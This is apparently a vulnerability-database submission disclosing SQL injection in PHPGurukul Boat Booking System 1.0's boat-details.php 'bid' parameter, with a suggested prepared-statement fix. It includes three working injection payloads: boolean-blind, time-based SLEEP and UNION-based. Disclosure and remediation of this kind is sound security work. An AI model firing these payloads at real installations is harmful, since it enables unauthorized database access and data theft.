| Title | PHPGurukul Boat Booking System-PHP v1.0 SQL Injection |
|---|
| Description | # CVE Report - Phpgurukul Boat Booking System-PHP V1.0 SQL injection in /boat-details.php
## Vulnerability Title
SQL injection vulnerability in PHPGurukul Boat Booking System-PHP V1.0
## Vulnerability Description
SQL injection is a code injection technique used to attack data-driven applications by inserting malicious SQL statements into an entry field for execution. It exploits vulnerabilities in an application's software, such as improper filtering of user input or lack of strong typing, allowing attackers to manipulate SQL queries. This can lead to unauthorized access, data breaches, and other serious security issues.
## Affected Components
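- File: `/boat-details.php`
- Line: 65
- Vulnerable code:

```php
// $bid is interpolated directly into the quoted SQL string, so a single quote
// in the value ends the literal and the rest is parsed as SQL.
$rs = $query = mysqli_query($con, "SELECT * FROM tblboat WHERE ID='$bid'");
```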
## Attack Steps
- boolean-based blind
```
bid=1' AND 2740=2740 AND 'wrlL'='wrlL
```
- time-based blind
```
bid=1' AND (SELECT 1184 FROM (SELECT(SLEEP(5)))BDaU) AND 'ALMH'='ALMH
```
- UNION query
```
bid=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7171,0x585044684d4e5a71486a506966564a565a686a67416a63716a6f647a53484f5349684769445a4275,0x716b627a71),NULL,NULL,NULL,NULL-- -
```
## Affected Versions
PHPGurukul Boat Booking System-PHP V1.0
## Suggested Fix
Please fix the code in a timely manner and update the code version.
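
One way to implement the fix, as an added example that is not part of the original report or PHPGurukul's code: validate `bid` as a decimal id and bind it as a query parameter instead of interpolating it. `parse_boat_id` and `fetch_boat` are hypothetical names; the integer type of `tblboat.ID` and `bid` arriving in `$_GET` are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Assumes tblboat.ID is an integer key
// and $con is an open mysqli connection, as in the report's snippet.

/** Return bid as a positive int, or null if it is not a plain decimal id. */
function parse_boat_id(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;                 // rejects quotes, spaces, signs, empty input
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Fetch one boat row using a bound parameter instead of string interpolation. */
function fetch_boat(mysqli $con, int $bid): ?array
{
    $stmt = $con->prepare('SELECT * FROM tblboat WHERE ID = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed');
    }
    $stmt->bind_param('i', $bid);    // 'i' = integer; the value never enters the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Page-level use (hypothetical handler; assumes bid is a GET parameter):
// $bid = parse_boat_id($_GET['bid'] ?? null);
// if ($bid === null) { http_response_code(400); exit; }
// $boat = fetch_boat($con, $bid);

// CLI check on constructed inputs, including the report's boolean-based payload.
if (PHP_SAPI === 'cli') {
    $samples = ['1', '42', "1' AND 2740=2740 AND 'wrlL'='wrlL", '', '-1', '1 OR 1=1'];
    foreach ($samples as $s) {
        printf("%-40s => %s\n", var_export($s, true), var_export(parse_boat_id($s), true));
    }
}
```

The bound parameter alone closes the injection; the id validation lets the page reject malformed requests before they reach the database.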
## Contact Information
- Reporter: 1cfh |
|---|
| Source | https://github.com/1cfh/vuln-pub/issues/1 |
| User | 1cfh (UID 82595) |
| Submission | 03/09/2025 15:13 (1 Year ago) |
| Moderation | 03/17/2025 19:55 (8 days later) |
| Status | Accepted |
| VulDB entry | 299964 [PHPGurukul Boat Booking System 1.0 /boat-details.php bid sql injection] |
| Points | 20 |